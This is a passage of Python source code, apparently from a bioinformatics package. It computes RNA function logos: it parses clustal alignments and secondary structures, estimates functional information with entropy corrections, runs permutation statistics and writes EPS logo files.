0\n logo_outputDict = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n\n for coord in range(self.pos):\n for base in sorted(self.singles):\n\n if (base in self.info[coord]):\n if base not in self.height[coord]:\n self.height[coord][base] = {}\n for aainfo in sorted(self.height[coord][base].items(), key=itemgetter(1), reverse=True):\n logo_outputDict[base][coord][aainfo[0]] = self.info[coord][base] * aainfo[1]\n else:\n logo_outputDict[base][coord] = {}\n\n # output logos\n for base in logo_outputDict:\n logodata = \"\"\n for coord in sorted(logo_outputDict[base].keys()):\n if (len(str(coord)) > coord_length):\n coord_length = len(str(coord))\n logodata += \"numbering {{({}) makenumber}} if\\ngsave\\n\".format(coord)\n for aainfo in sorted(logo_outputDict[base][coord].items(), key=itemgetter(1)):\n if (aainfo[1] < 0.0001 or mt.isnan(aainfo[1])):\n continue\n logodata += \"{:07.5f} ({}) numchar\\n\".format(aainfo[1], aainfo[0].upper())\n logodata += \"grestore\\nshift\\n\"\n # output logodata to template\n template_byte = pkgutil.get_data('tsfm', 'eps/Template.eps')\n logo_template = template_byte.decode('utf-8')\n with open(\"{}_{}.eps\".format(base, self.name.split(\"/\")[-1]), \"w\") as logo_output:\n src = Template(logo_template)\n if (len(base) == 2):\n logodata_dict = {'logo_data': logodata, 'low': min(logo_outputDict[base].keys()),\n 'high': max(logo_outputDict[base].keys()),\n 'length': 21 * len(logo_outputDict[base].keys()),\n 'height': 735 - (5 * (coord_length + coord_length_addition))}\n else:\n logodata_dict = {'logo_data': logodata, 'low': min(logo_outputDict[base].keys()),\n 'high': max(logo_outputDict[base].keys()),\n 'length': 15.68 * len(logo_outputDict[base].keys()),\n 'height': 735 - (5 * (coord_length + coord_length_addition))}\n logo_output.write(src.substitute(logodata_dict))\n\n def logo_output(self, inverse=False):\n \"\"\"\n Produce function logo postscript files\n \"\"\"\n coord_length = 0 # used to determine eps height\n coord_length_addition = 0\n # print(\" hiiiiiiiiiiiii\", len(self.basepairs))\n logo_outputDict = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n\n # logo output dict construction\n for coord in sorted(self.basepairs, key=itemgetter(0)):\n\n for pairtype in sorted(self.pairs):\n if (coord in self.info and pairtype in self.info[coord]): # we added this.\n for aainfo in sorted(self.height[coord][pairtype].items(), key=itemgetter(1), reverse=True):\n logo_outputDict[pairtype][coord][aainfo[0]] = self.info[coord][pairtype] * aainfo[1]\n else:\n logo_outputDict[pairtype][coord] = {}\n\n for coord in range(self.pos): # 0,1,2..,72\n for base in sorted(self.singles): # ACGU..\n if (base in self.info[coord]):\n # print(self.height[coord][base].items(), \" items.\")\n for aainfo in sorted(self.height[coord][base].items(), key=itemgetter(1), reverse=True):\n logo_outputDict[base][coord][aainfo[0]] = self.info[coord][base] * aainfo[1]\n else:\n logo_outputDict[base][coord] = {}\n\n # output logos\n for base in logo_outputDict:\n logodata = \"\"\n for coord in sorted(logo_outputDict[base].keys()):\n if (len(str(coord)) > coord_length):\n coord_length = len(str(coord))\n logodata += \"numbering {{({}) makenumber}} if\\ngsave\\n\".format(coord)\n for aainfo in sorted(logo_outputDict[base][coord].items(), key=itemgetter(1)):\n if (aainfo[1] < 0.0001 or mt.isnan(aainfo[1])):\n continue\n logodata += \"{:07.5f} ({}) numchar\\n\".format(aainfo[1], aainfo[0].upper())\n logodata += \"grestore\\nshift\\n\"\n # output logodata to template\n 
template_byte = pkgutil.get_data('tsfm', 'eps/Template.eps')\n logo_template = template_byte.decode('utf-8')\n with open(\"{}_{}.eps\".format(base, self.name.split(\"/\")[-1]), \"w\") as logo_output:\n src = Template(logo_template)\n if (len(base) == 2):\n logodata_dict = {'logo_data': logodata, 'low': min(logo_outputDict[base].keys()),\n 'high': max(logo_outputDict[base].keys()),\n 'length': 21 * len(logo_outputDict[base].keys()),\n 'height': 735 - (5 * (coord_length + coord_length_addition))}\n # print(735 - (5 * (coord_length + coord_length_addition)), \"heigh base\")\n else:\n logodata_dict = {'logo_data': logodata, 'low': min(logo_outputDict[base].keys()),\n 'high': max(logo_outputDict[base].keys()),\n 'length': 15.68 * len(logo_outputDict[base].keys()),\n 'height': 735 - (5 * (coord_length + coord_length_addition))}\n # print(735 - (5 * (coord_length + coord_length_addition)), \"heigh\", base)\n\n # print(logo_outputDict[base].keys(),base)\n # print(logodata_dict)\n # print( 735 - (5 * (coord_length + coord_length_addition)),\"kkkkkkkkkkkkkk\")\n logo_output.write(src.substitute(logodata_dict))\n\n if (inverse):\n\n inverse_logo_outputDict = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n # inverse logo output dict construction\n for coord in sorted(self.basepairs, key=itemgetter(0)):\n for pairtype in sorted(self.pairs):\n if (pairtype in self.inverseInfo[coord]):\n for aainfo in sorted(self.inverseHeight[coord][pairtype].items(), key=itemgetter(1),\n reverse=True):\n inverse_logo_outputDict[pairtype][coord][aainfo[0]] = self.inverseInfo[coord][pairtype] * \\\n aainfo[1]\n else:\n inverse_logo_outputDict[pairtype][coord] = {}\n\n for coord in range(self.pos):\n for base in sorted(self.singles):\n if (base in self.inverseInfo[coord]):\n for aainfo in sorted(self.inverseHeight[coord][base].items(), key=itemgetter(1), reverse=True):\n inverse_logo_outputDict[base][coord][aainfo[0]] = self.inverseInfo[coord][base] * aainfo[1]\n else:\n inverse_logo_outputDict[base][coord] = {}\n\n for base in inverse_logo_outputDict:\n logodata = \"\"\n for coord in sorted(inverse_logo_outputDict[base].keys()):\n if (len(str(coord)) > coord_length):\n coord_length = len(str(coord))\n logodata += \"numbering {{({}) makenumber}} if\\ngsave\\n\".format(coord)\n for aainfo in sorted(inverse_logo_outputDict[base][coord].items(), key=itemgetter(1)):\n if (aainfo[1] < 0.0001 or mt.isnan(aainfo[1])):\n continue\n logodata += \"{:07.5f} ({}) numchar\\n\".format(aainfo[1], aainfo[0].upper())\n logodata += \"grestore\\nshift\\n\"\n # output logodata to template\n template_byte = pkgutil.get_data('tsfm', 'eps/Template.eps')\n logo_template = template_byte.decode('utf-8')\n with open(\"inverse_{}_{}.eps\".format(base, self.name.split(\"/\")[-1]), \"w\") as logo_output:\n src = Template(logo_template)\n if (len(base) == 2):\n logodata_dict = {'logo_data': logodata, 'low': min(inverse_logo_outputDict[base].keys()),\n 'high': max(inverse_logo_outputDict[base].keys()),\n 'length': 21 * len(inverse_logo_outputDict[base].keys()),\n 'height': 735 - (5 * (coord_length + coord_length_addition))}\n else:\n logodata_dict = {'logo_data': logodata, 'low': min(inverse_logo_outputDict[base].keys()),\n 'high': max(inverse_logo_outputDict[base].keys()),\n 'length': 15.68 * len(inverse_logo_outputDict[base].keys()),\n 'height': 735 - (5 * (coord_length + coord_length_addition))}\n logo_output.write(src.substitute(logodata_dict))\n\n\nclass FunctionLogoDist:\n \"\"\"\n Discrete probability distributions of information 
values.\n Probability distributions are created using a permutation label shuffling\n strategy. Permuted data is created using :meth:`FunctionLogo.permute` and\n distributions are inferred from the permuted data and \n :class:`FunctionLogoDist` objects created using \n :meth:`FunctionLogo.permInfo`.\n\n Attributes:\n bpinfodist (:obj:`dict` of :obj:`float` mapping to :obj:`int`):\n Discrete probability distribution of basepair feature information\n bpheightdist (:obj:`dict` of :obj:`float` mapping to :obj:`int`):\n Discrete probability distribution of functional class \n information of basepair features\n singleinfodist (:obj:`dict` of :obj:`float` mapping to :obj:`int`):\n Discrete probability distribution of single base feature information\n singleheightdist (:obj:`dict` of :obj:`float` mapping to :obj:`int`):\n Discrete probability distribution of functional class \n information of single base features\n\n \"\"\"\n\n def __init__(self):\n\n self.bpinfodist = defaultdict(int)\n self.bpheightdist = defaultdict(int)\n\n self.singleinfodist = defaultdict(int)\n self.singleheightdist = defaultdict(int)\n\n def weighted_dist(self, bpdata, singledata):\n for x in bpdata[0]:\n self.bpinfodist[x] += 1\n for x in bpdata[1]:\n self.bpheightdist[x] += 1\n\n for x in singledata[0]:\n self.singleinfodist[x] += 1\n for x in singledata[1]:\n self.singleheightdist[x] += 1\n\n self.bpinfo_sorted_keys = sorted(self.bpinfodist.keys())\n self.bpheight_sorted_keys = sorted(self.bpheightdist.keys())\n self.ssinfo_sorted_keys = sorted(self.singleinfodist.keys())\n self.ssheight_sorted_keys = sorted(self.singleheightdist.keys())\n\n def stat_test(self, info, height, correction):\n \"\"\"\n Performs statistical tests and multiple test correction.\n\n Calculates a p-value using a right tail probability test on the\n instance's discrete probability distributions. Methods for multiple test\n correction are provided by :class:`statsmodels.stats.multitest`. This\n method is usually invoked using :meth:`FunctionLogoResults.add_stats`.\n\n Args:\n info (:obj:`dict` of :obj:`int` or :obj:`tuple` mapping to :obj:`dict` of :obj:`str` mapping to :obj:`float`):\n mapping of structural features to information content.\n height (:obj:`dict` of :obj:`int` or :obj:`tuple` mapping to :obj:`dict` of :obj:`str` mapping to :obj:`dict` of :obj:`str` mapping to :obj:`float`):\n mapping of structural features and functional class to class height.\n correction (:obj:`str`): Method for multiple test correction. 
Any \n method available in :class:`statsmodels.stats.multitest` is a\n valid option.\n \"\"\"\n P = defaultdict(lambda: defaultdict(float))\n P_corrected = defaultdict(lambda: defaultdict(float))\n p = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n p_corrected = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n bp_coords = []\n ss_coords = []\n for coord in info:\n for pairtype in info[coord]:\n if (\",\" in str(coord)):\n bp_coords.append(coord)\n P[coord][pairtype] = self.rtp(self.bpinfodist, info[coord][pairtype], self.bpinfo_sorted_keys)\n for aa in height[coord][pairtype]:\n p[coord][pairtype][aa] = self.rtp(self.bpheightdist,\n info[coord][pairtype] * height[coord][pairtype][aa],\n self.bpheight_sorted_keys)\n else:\n ss_coords.append(coord)\n P[coord][pairtype] = self.rtp(self.singleinfodist, info[coord][pairtype], self.ssinfo_sorted_keys)\n for aa in height[coord][pairtype]:\n p[coord][pairtype][aa] = self.rtp(self.singleheightdist,\n info[coord][pairtype] * height[coord][pairtype][aa],\n self.ssheight_sorted_keys)\n test_bp = []\n test_ss = []\n bp_coords.sort()\n ss_coords.sort()\n for coord in bp_coords:\n for pairtype in sorted(P[coord]):\n test_bp.append(P[coord][pairtype])\n\n for coord in ss_coords:\n for pairtype in sorted(P[coord]):\n test_ss.append(P[coord][pairtype])\n\n test_bp_results = smm.multipletests(test_bp, method=correction)[1].tolist()\n test_ss_results = smm.multipletests(test_ss, method=correction)[1].tolist()\n\n for coord in bp_coords:\n for pairtype in sorted(P[coord]):\n P_corrected[coord][pairtype] = test_bp_results.pop(0)\n\n for coord in ss_coords:\n for pairtype in sorted(P[coord]):\n P_corrected[coord][pairtype] = test_ss_results.pop(0)\n\n test_bp = []\n test_ss = []\n for coord in bp_coords:\n for pairtype in sorted(p[coord]):\n for aa in sorted(p[coord][pairtype]):\n test_bp.append(p[coord][pairtype][aa])\n\n for coord in ss_coords:\n for pairtype in sorted(p[coord]):\n for aa in sorted(p[coord][pairtype]):\n test_ss.append(p[coord][pairtype][aa])\n\n test_bp_results = smm.multipletests(test_bp, method=correction)[1].tolist()\n test_ss_results = smm.multipletests(test_ss, method=correction)[1].tolist()\n\n for coord in bp_coords:\n for pairtype in sorted(p[coord]):\n for aa in sorted(p[coord][pairtype]):\n p_corrected[coord][pairtype][aa] = test_bp_results.pop(0)\n\n for coord in ss_coords:\n for pairtype in sorted(p[coord]):\n for aa in sorted(p[coord][pairtype]):\n p_corrected[coord][pairtype][aa] = test_ss_results.pop(0)\n\n return {'P': P, 'p': p, \"P_corrected\": P_corrected, \"p_corrected\": p_corrected}\n\n def rtp(self, data, point, keys_sorted):\n if (point > 0):\n part = 0\n total = sum(data.values())\n i = bisect.bisect_left(keys_sorted, point)\n if (point <= keys_sorted[-1]):\n for y in keys_sorted[i:]:\n part += data[y]\n return part / total\n else:\n return 0.0\n else:\n return 1.0\n\n\nclass Seq:\n \"\"\"\n Provides a data structure consisting of a molecular sequence labeled with a functional class.\n\n Args:\n function (:obj:`str`): Functional annotation of the sequence.\n seq (:obj:`str`): Molecular sequence data.\n \"\"\"\n\n def __init__(self, function, seq):\n self.function = function\n self.seq = seq\n\n def __len__(self):\n return len(self.seq)\n\n\nclass FunctionLogo:\n \"\"\"\n Parses structural and sequence information and provides methods for Function Logo calculations\n\n This class provides data structures and methods for calculating \n functional information of basepair and single base 
features. Additionally, it provides\n methods for producing permuted data sets with function class labels\n shuffled.\n \n Args:\n struct_file (:obj:`str`): File name containing secondary structure\n notation in cove, infernal, or text format.\n kind (:obj:`str`): secondary structure notation format.\n\n \"\"\"\n\n def __init__(self, struct_file, kind=None, exact_init=None, inverse_init=None):\n if (exact_init):\n self.exact = exact_init\n else:\n self.exact = []\n\n if (inverse_init):\n self.inverse_exact = inverse_init\n else:\n self.inverse_exact = []\n\n if (kind):\n if (kind == \"s\"):\n self.basepairs = []\n else:\n self.parse_struct(struct_file, kind)\n else:\n self.basepairs = struct_file\n self.pos = 0\n self.sequences = []\n self.pairs = set()\n self.singles = set()\n self.functions = Counter()\n\n def parse_sequences(self, file_prefix):\n \"\"\"\n Parse sequence alignment data in clustal format\n\n Sequence alignment files are required to be in clustal format with\n each functional class having its own file. Alignment files must\n conform to the naming standard ``fileprefix_functionalclass.aln``.\n\n Args:\n file_prefix (:obj:`str`): Prefix used to identify a group of alignment files.\n\n \"\"\"\n for fn in glob.glob(\"{}_?.aln\".format(file_prefix)):\n match = re.search(\"_([A-Z])\\.aln\", fn)\n aa_class = match.group(1)\n with open(fn, \"r\") as ALN:\n good = False\n begin_seq = False\n interleaved = False\n seq = {}\n for line in ALN:\n match = re.search(\"^(\\S+)\\s+(\\S+)\", line)\n if (re.search(\"^CLUSTAL\", line)):\n good = True\n continue\n elif (re.search(\"^[\\s\\*\\.\\:]+$\", line) and not interleaved and begin_seq):\n interleaved = True\n elif (re.search(\"^[\\s\\*\\.\\:]+$\", line) and interleaved and begin_seq):\n continue\n elif (match and not interleaved):\n begin_seq = True\n if (not good):\n sys.exit(\"File {} appears not to be a clustal file\".format(fn))\n seq[match.group(1)] = match.group(2)\n elif (match and interleaved):\n seq[match.group(1)] += match.group(2)\n for sequence in seq.values():\n # print(aa_class)\n self.add_sequence(aa_class, sequence.upper().replace(\"T\", \"U\"))\n\n print(\"{} alignments parsed\".format(len(self.functions.keys())), file=sys.stderr)\n\n def parse_struct(self, struct_file, kind):\n \"\"\"\n Parse secondary structure file for basepair locations.\n\n Args:\n struct_file (:obj:`str`): File containing structural annotation\n kind (:obj:`str`): Structural annotation format\n \"\"\"\n print(\"Parsing base-pair coordinates\", file=sys.stderr)\n basepairs = []\n ss = \"\"\n pairs = defaultdict(list)\n tarm = 0\n stack = []\n if (kind == \"infernal\"):\n for line in struct_file:\n line = line.strip()\n ss += line.split()[2]\n struct_file.seek(0)\n\n state = \"start\"\n for count, i in enumerate(ss):\n if (i == \"(\"):\n stack.append(count) # an opening \"(\" must be pushed so the matching \")\" can pop it\n if (state == \"start\"):\n state = \"A\"\n elif (i == \"<\"):\n stack.append(count)\n if (state == \"A\"):\n state = \"D\"\n elif (state == \"cD\"):\n state = \"C\"\n elif (state == \"cC\"):\n state = \"T\"\n elif (i == \">\"):\n if (state == \"D\"):\n state = \"cD\"\n elif (state == \"C\"):\n state = \"cC\"\n elif (state == \"T\"):\n state = \"cT\"\n\n arm = state.replace(\"c\", \"\")\n pairs[arm].append([stack.pop(), count])\n elif (i == \")\"):\n pairs['A'].append([stack.pop(), count])\n\n for arm in pairs:\n for pair in pairs[arm]:\n basepairs.append((pair[0], pair[1]))\n\n if (kind == \"cove\"):\n for line in struct_file:\n line = line.strip()\n ss += line.split()[1]\n struct_file.seek(0)\n\n state = \"start\"\n for 
count, i in enumerate(ss):\n if (i == \">\" and (state == \"start\" or state == \"AD\")):\n if (state == \"start\"):\n state = \"AD\"\n stack.append(count)\n\n elif (i == \"<\" and (state == \"AD\" or state == \"D\")):\n if (state == \"AD\"):\n state = \"D\"\n pairs[state].append([stack.pop(), count])\n\n elif (i == \">\" and (state == \"D\" or state == \"C\")):\n if (state == \"D\"):\n state = \"C\"\n stack.append(count)\n\n elif (i == \"<\" and (state == \"C\" or state == \"cC\")):\n if (state == \"C\"):\n state = \"cC\"\n pairs[\"C\"].append([stack.pop(), count])\n\n elif (i == \">\" and (state == \"cC\" or state == \"T\")):\n if (state == \"cC\"):\n state = \"T\"\n stack.append(count)\n tarm += 1\n\n elif (i == \"<\" and (state == \"T\" and tarm > 0)):\n pairs[state].append([stack.pop(), count])\n tarm -= 1\n\n elif (i == \"<\" and (state == \"T\" or state == \"A\") and tarm == 0):\n state = \"A\"\n pairs[state].append([stack.pop(), count])\n\n for arm in pairs:\n for pair in pairs[arm]:\n basepairs.append((pair[0], pair[1]))\n\n if (kind == \"text\"):\n for line in struct_file:\n coords = \"\".join(line.split(\":\")[1])\n coords = coords.split(\",\")\n for coord1, coord2 in zip(coords[0::2], coords[1::2]):\n basepairs.append((int(coord1), int(coord2)))\n\n self.basepairs = basepairs\n\n def approx_expect(self, H, k, N):\n return H - ((k - 1) / ((mt.log(4)) * N))\n\n def exact_run(self, n, p, numclasses):\n ######################################\n j = exact.calc_exact(n, p, numclasses)\n print(\"{:2} {:07.5f}\".format(n, j[1]), file=sys.stderr)\n return j\n\n def permuted(self, items, pieces=2):\n random.seed()\n sublists = [[] for i in range(pieces)]\n for x in items:\n sublists[random.randint(0, pieces - 1)].append(x)\n permutedList = []\n for i in range(pieces):\n time.sleep(0.01)\n random.seed()\n random.shuffle(sublists[i])\n permutedList.extend(sublists[i])\n return permutedList\n\n def permutations(self, numPerm, aa_classes):\n indices = []\n permStructList = []\n for p in range(numPerm):\n indices.append(self.permuted(aa_classes))\n for index in indices:\n permStruct = FunctionLogo(self.basepairs, exact_init=self.exact, inverse_init=self.inverse_exact)\n for i, seqs in enumerate(self.sequences):\n permStruct.add_sequence(index[i], seqs.seq)\n permStructList.append(permStruct)\n return permStructList\n\n def permute(self, permute_num, proc):\n \"\"\"\n Creates permuted datasets by shuffling functional annotation labels of sequences.\n\n Args:\n permute_num (:obj:`int`): Number of permutations to perform\n proc (:obj:`int`): Number of concurrent processes to run\n \"\"\"\n with Pool(processes=proc) as pool:\n perm_jobs = []\n for x in range(proc):\n if (x == 0):\n perm_jobs.append((permute_num // proc + permute_num % proc, self.get_functions()))\n else:\n perm_jobs.append((permute_num // proc, self.get_functions()))\n\n perm_results = pool.starmap(self.permutations, perm_jobs)\n self.permutationList = []\n for x in perm_results:\n self.permutationList += x\n\n def permInfo(self, method, proc, inverse=False):\n \"\"\"\n Calculate functional information statistics of permuted datasets.\n\n Args:\n method (:obj:`str`): Entropy estimation method. 
Either NSB or Miller-Maddow.\n proc (:obj:`int`): Number of concurrent processes to run.\n\n Return:\n perm_dist (:class:`FunctionLogoDist`): Discrete distribution of \n functional information estimated from permuted datasets.\n \"\"\"\n bp_info = []\n bp_height = []\n single_info = []\n single_height = []\n with Pool(processes=proc) as pool:\n if (len(self.permutationList) < proc):\n chunk = 1\n else:\n chunk = len(self.permutationList) // proc\n\n if (not inverse):\n if (method == \"NSB\"):\n perm_info_results = pool.map(self.perm_info_calc_NSB, self.permutationList, chunk)\n else:\n perm_info_results = pool.map(self.perm_info_calc_MM, self.permutationList, chunk)\n else:\n if (method == \"NSB\"):\n perm_info_results = pool.map(self.perm_info_calc_inverse_NSB, self.permutationList, chunk)\n else:\n perm_info_results = pool.map(self.perm_info_calc_inverse_MM, self.permutationList, chunk)\n\n for perm in perm_info_results:\n bp_info.extend(perm[0])\n single_info.extend(perm[1])\n bp_height.extend(perm[2])\n single_height.extend(perm[3])\n\n perm_dist = FunctionLogoDist()\n perm_dist.weighted_dist((bp_info, bp_height), (single_info, single_height))\n return perm_dist\n\n def perm_info_calc_MM(self, x):\n total_info_bp = []\n height_info_bp = []\n total_info_ss = []\n height_info_ss = []\n info, height_dict = x.calculate_entropy_MM()\n for coord in sorted(self.basepairs, key=itemgetter(0)):\n if (coord in info):\n for pairtype in sorted(info[coord]):\n total_info_bp.append(info[coord][pairtype])\n for aainfo in sorted(height_dict[coord][pairtype].items(), key=itemgetter(1), reverse=True):\n height_info_bp.append(aainfo[1] * info[coord][pairtype])\n\n for coord in range(self.pos):\n if (coord in info):\n for base in sorted(info[coord]):\n total_info_ss.append(info[coord][base])\n for aainfo in sorted(height_dict[coord][base].items(), key=itemgetter(1), reverse=True):\n height_info_ss.append(aainfo[1] * info[coord][base])\n\n return (total_info_bp, total_info_ss, height_info_bp, height_info_ss)\n\n def perm_info_calc_inverse_MM(self, x):\n total_info_bp = []\n height_info_bp = []\n total_info_ss = []\n height_info_ss = []\n info, height_dict = x.calculate_entropy_inverse_MM()\n\n for coord in sorted(self.basepairs, key=itemgetter(0)):\n if (coord in info):\n for pairtype in sorted(info[coord]):\n total_info_bp.append(info[coord][pairtype])\n for aainfo in sorted(height_dict[coord][pairtype].items(), key=itemgetter(1), reverse=True):\n height_info_bp.append(aainfo[1] * info[coord][pairtype])\n\n for coord in range(self.pos):\n if (coord in info):\n for base in sorted(info[coord]):\n total_info_ss.append(info[coord][base])\n for aainfo in sorted(height_dict[coord][base].items(), key=itemgetter(1), reverse=True):\n height_info_ss.append(aainfo[1] * info[coord][base])\n\n return (total_info_bp, total_info_ss, height_info_bp, height_info_ss)\n\n def perm_info_calc_inverse_NSB(self, x):\n total_info_bp = []\n height_info_bp = []\n total_info_ss = []\n height_info_ss = []\n info, height_dict = x.calculate_entropy_inverse_NSB()\n\n for coord in sorted(self.basepairs, key=itemgetter(0)):\n if (coord in info):\n for pairtype in sorted(info[coord]):\n total_info_bp.append(info[coord][pairtype])\n for aainfo in sorted(height_dict[coord][pairtype].items(), key=itemgetter(1), reverse=True):\n height_info_bp.append(aainfo[1] * info[coord][pairtype])\n\n for coord in range(self.pos):\n if (coord in info):\n for base in sorted(info[coord]):\n total_info_ss.append(info[coord][base])\n for aainfo in 
sorted(height_dict[coord][base].items(), key=itemgetter(1), reverse=True):\n height_info_ss.append(aainfo[1] * info[coord][base])\n\n return (total_info_bp, total_info_ss, height_info_bp, height_info_ss)\n\n def perm_info_calc_NSB(self, x):\n total_info_bp = []\n height_info_bp = []\n total_info_ss = []\n height_info_ss = []\n info, height_dict = x.calculate_entropy_NSB()\n\n for coord in sorted(self.basepairs, key=itemgetter(0)):\n if (coord in info):\n for pairtype in sorted(info[coord]):\n total_info_bp.append(info[coord][pairtype])\n for aainfo in sorted(height_dict[coord][pairtype].items(), key=itemgetter(1), reverse=True):\n height_info_bp.append(aainfo[1] * info[coord][pairtype])\n\n for coord in range(self.pos):\n if (coord in info):\n for base in sorted(info[coord]):\n total_info_ss.append(info[coord][base])\n for aainfo in sorted(height_dict[coord][base].items(), key=itemgetter(1), reverse=True):\n height_info_ss.append(aainfo[1] * info[coord][base])\n\n return (total_info_bp, total_info_ss, height_info_bp, height_info_ss)\n\n def calculate_exact(self, n, proc, inverse=False):\n \"\"\"\n Exact method of small sample size correction.\n\n Calculate the exact sample size correction for sample sizes up to n.\n The computationally intensive portion of the calculation is implemented as a C\n extension. This method is fully described in Schneider et al. 1986.\n This calculation is polynomial in sample size. It becomes prohibitively\n expensive to calculate beyond a sample size of 16. The correction\n factor for each sample size will be calculated in parallel, up to\n :obj:`proc` at a time.\n\n Args:\n n (:obj:`int`): Calculate correction up to this sample size.\n proc (:obj:`int`): Number of concurrent processes to run.\n inverse (:obj:`bool`): If True, calculate the sample size correction\n for anti-determinants.\n \"\"\"\n exact_list = []\n exact_results = []\n if (inverse):\n inverse_functions = Counter()\n for aa_class in self.functions:\n inverse_functions[aa_class] = sum(self.functions.values()) / self.functions[aa_class]\n\n p = [x / sum(list(inverse_functions.values())) for x in inverse_functions.values()]\n for i in range(1, n + 1):\n exact_list.append((i, p, len(self.functions.values())))\n\n with Pool(processes=proc) as pool:\n exact_results = pool.starmap(self.exact_run, exact_list)\n\n for x in exact_results:\n self.inverse_exact.append(x[1])\n else:\n p = [x / sum(list(self.functions.values())) for x in\n self.functions.values()] # proportion of each function class,
e.g. 0.34 for a class covering 34% of the sequences\n for i in range(1, n + 1):\n exact_list.append((i, p, len(self.functions.values())))\n\n with Pool(processes=proc) as pool:\n exact_results = pool.starmap(self.exact_run, exact_list)\n\n for x in exact_results:\n self.exact.append(x[1])\n\n def calculate_entropy_MM(self):\n \"\"\"\n Calculate functional information using the Miller-Maddow estimator.\n \"\"\"\n info = defaultdict(lambda: defaultdict(float))\n height_dict = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n\n functions_array = np.array(list(self.functions.values()))\n bg_entropy = -np.sum(\n (functions_array[functions_array != 0] / functions_array[functions_array != 0].sum()) * np.log2(\n functions_array[functions_array != 0] / functions_array[functions_array != 0].sum()))\n for pairs in self.basepairs:\n for state in self.pairs:\n state_counts = self.get(pairs, state)\n if (sum(state_counts.values()) == 0):\n continue\n\n nsb_array = np.array(list(state_counts.values()) + [0] * (len(self.functions) - len(state_counts)))\n fg_entropy = -np.sum((nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()) * np.log2(\n nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()))\n if (sum(state_counts.values()) <= len(self.exact)):\n expected_bg_entropy = self.exact[sum(state_counts.values()) - 1]\n else:\n expected_bg_entropy = self.approx_expect(bg_entropy, len(self.functions),\n sum(state_counts.values()))\n\n if (expected_bg_entropy - fg_entropy < 0):\n info[pairs][state] = 0\n else:\n info[pairs][state] = expected_bg_entropy - fg_entropy\n\n height_class = {}\n for aa_class in state_counts:\n height_class[aa_class] = (state_counts[aa_class] / sum(state_counts.values())) / (\n self.functions[aa_class] / len(self))\n for aa_class in height_class:\n height_dict[pairs][state][aa_class] = height_class[aa_class] / sum(height_class.values())\n\n for singles in range(self.pos):\n for state in self.singles:\n state_counts = self.get([singles], state)\n if (sum(state_counts.values()) == 0):\n continue\n\n nsb_array = np.array(list(state_counts.values()) + [0] * (len(self.functions) - len(state_counts)))\n fg_entropy = -np.sum((nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()) * np.log2(\n nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()))\n if (sum(state_counts.values()) <= len(self.exact)):\n expected_bg_entropy = self.exact[sum(state_counts.values()) - 1]\n else:\n expected_bg_entropy = self.approx_expect(bg_entropy, len(self.functions),\n sum(state_counts.values()))\n\n if (expected_bg_entropy - fg_entropy < 0):\n info[singles][state] = 0\n else:\n info[singles][state] = expected_bg_entropy - fg_entropy\n\n height_class = {}\n for aa_class in state_counts:\n height_class[aa_class] = (state_counts[aa_class] / sum(state_counts.values())) / (\n self.functions[aa_class] / len(self))\n for aa_class in height_class:\n height_dict[singles][state][aa_class] = height_class[aa_class] / sum(height_class.values())\n\n return (info, height_dict)\n\n def calculate_entropy_inverse_MM(self):\n \"\"\"\n Calculate functional information for anti-determinants using the Miller-Maddow estimator.\n \"\"\"\n info_inverse = defaultdict(lambda: defaultdict(float))\n height_dict_inverse = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n inverse_functions = Counter()\n for aa_class in self.functions:\n inverse_functions[aa_class] = sum(self.functions.values()) / self.functions[aa_class]\n\n np_inverse_functions = np.array(list(inverse_functions.values()))\n bg_entropy =
-np.sum((np_inverse_functions[np_inverse_functions != 0] / np_inverse_functions[\n np_inverse_functions != 0].sum()) * np.log2(\n np_inverse_functions[np_inverse_functions != 0] / np_inverse_functions[np_inverse_functions != 0].sum()))\n for pairs in self.basepairs:\n for state in self.pairs:\n state_counts = self.get(pairs, state)\n if (sum(state_counts.values()) == 0):\n continue\n if (not len(state_counts) == len(self.functions)):\n for function in self.functions:\n state_counts[function] += 1\n\n inverse_state_counts = Counter()\n for aa_class in state_counts:\n inverse_state_counts[aa_class] = sum(state_counts.values()) / state_counts[aa_class]\n\n nsb_array = np.array(list(inverse_state_counts.values()))\n fg_entropy = -np.sum((nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()) * np.log2(\n nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()))\n if (sum(state_counts.values()) <= len(self.inverse_exact)):\n expected_bg_entropy = self.inverse_exact[sum(state_counts.values()) - 1]\n else:\n expected_bg_entropy = self.approx_expect(bg_entropy, len(self.functions),\n sum(state_counts.values()))\n\n if (expected_bg_entropy - fg_entropy < 0):\n info_inverse[pairs][state] = 0\n else:\n info_inverse[pairs][state] = expected_bg_entropy - fg_entropy\n\n height_class = {}\n for aa_class in inverse_state_counts:\n height_class[aa_class] = (inverse_state_counts[aa_class] / sum(inverse_state_counts.values())) / (\n inverse_functions[aa_class] / sum(inverse_functions.values()))\n for aa_class in height_class:\n height_dict_inverse[pairs][state][aa_class] = height_class[aa_class] / sum(height_class.values())\n\n for singles in range(self.pos):\n for state in self.singles:\n state_counts = self.get([singles], state)\n if (sum(state_counts.values()) == 0):\n continue\n if (not len(state_counts) == len(self.functions)):\n for function in self.functions:\n state_counts[function] += 1\n\n inverse_state_counts = Counter()\n for aa_class in state_counts:\n inverse_state_counts[aa_class] = sum(state_counts.values()) / state_counts[aa_class]\n\n nsb_array = np.array(list(inverse_state_counts.values()))\n fg_entropy = -np.sum((nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()) * np.log2(\n nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()))\n if (sum(state_counts.values()) <= len(self.inverse_exact)):\n expected_bg_entropy = self.inverse_exact[sum(state_counts.values()) - 1]\n else:\n expected_bg_entropy = self.approx_expect(bg_entropy, len(self.functions),\n sum(state_counts.values()))\n\n if (expected_bg_entropy - fg_entropy < 0):\n info_inverse[singles][state] = 0\n else:\n info_inverse[singles][state] = expected_bg_entropy - fg_entropy\n\n height_class = {}\n for aa_class in inverse_state_counts:\n 